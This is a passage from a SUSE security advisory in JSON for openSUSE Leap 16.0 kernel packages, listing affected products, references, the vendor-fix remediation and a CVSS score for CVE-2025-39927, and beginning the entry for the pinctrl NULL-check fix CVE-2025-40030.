"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39927",
"url": "https://www.suse.com/security/cve/CVE-2025-39927"
},
{
"category": "external",
"summary": "SUSE Bug 1250738 for CVE-2025-39927",
"url": "https://bugzilla.suse.com/1250738"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-39927"
},
{
"cve": "CVE-2025-40030",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40030"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: check the return value of pinmux_ops::get_function_name()\n\nWhile the API contract in docs doesn\u0027t specify it explicitly, the\ngeneric implementation of the get_function_name() callback from struct\npinmux_ops - pinmux_generic_get_function_name() - can fail and return\nNULL. This is already checked in pinmux_check_ops() so add a similar\ncheck in pinmux_func_name_to_selector() instead of passing the returned\npointer right down to strcmp() where the NULL can get dereferenced. This\nis normal operation when adding new pinfunctions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
